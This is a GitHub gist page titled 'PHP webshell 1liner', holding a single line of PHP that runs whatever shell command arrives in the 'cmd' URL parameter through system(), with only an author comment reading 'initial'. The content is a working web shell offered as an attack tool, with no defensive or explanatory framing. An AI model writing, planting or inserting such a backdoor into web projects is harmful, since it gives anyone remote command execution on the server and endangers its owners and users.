Skip to content

Instantly share code, notes, and snippets.

@kecs
Created February 11, 2024 15:05
Show Gist options
  • Save kecs/808cd1c96d3a7c42171807aadf0a290e to your computer and use it in GitHub Desktop.
Save kecs/808cd1c96d3a7c42171807aadf0a290e to your computer and use it in GitHub Desktop.
PHP webshell 1liner
<?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?>
@kecs
Copy link
Author

kecs commented Feb 11, 2024

initial

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment